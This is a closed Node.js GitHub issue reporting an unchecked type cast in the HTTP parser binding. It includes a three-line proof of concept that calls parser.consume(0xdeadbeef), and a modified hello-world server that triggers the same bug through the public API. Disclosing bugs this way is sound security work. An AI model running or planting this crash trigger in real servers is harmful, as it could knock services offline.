-
-
Notifications
You must be signed in to change notification settings - Fork 32.3k
Closed
Labels
c++Issues and PRs that require attention from people who are familiar with C++.Issues and PRs that require attention from people who are familiar with C++.http_parserIssues and PRs related to the HTTP Parser dependency or the http_parser binding.Issues and PRs related to the HTTP Parser dependency or the http_parser binding.
Description
We found unchecked type cast in the HTTP parser code. This one is in https://github.com/nodejs/node/blob/master/src/node_http_parser.cc#L496
Here is the 3 line exploit:
const HTTPParser = process.binding('http_parser').HTTPParser;
var parser = new HTTPParser(HTTPParser.REQUEST);
parser.consume(0xdeadbeef);
Can also just modifying the example on the nodejs.org site to trigger bug with public API:
const http = require('http');
const hostname = '127.0.0.1';
const port = 3000;
const server = http.createServer((req, res) => {
res.statusCode = 200;
req.socket.parser.consume(0xdeadbeef);
res.setHeader('Content-Type', 'text/plain');
res.end('Hello World\n');
});
server.listen(port, hostname, () => {
console.log(`Server running at http://${hostname}:${port}/`);
});
Metadata
Metadata
Assignees
Labels
c++Issues and PRs that require attention from people who are familiar with C++.Issues and PRs that require attention from people who are familiar with C++.http_parserIssues and PRs related to the HTTP Parser dependency or the http_parser binding.Issues and PRs related to the HTTP Parser dependency or the http_parser binding.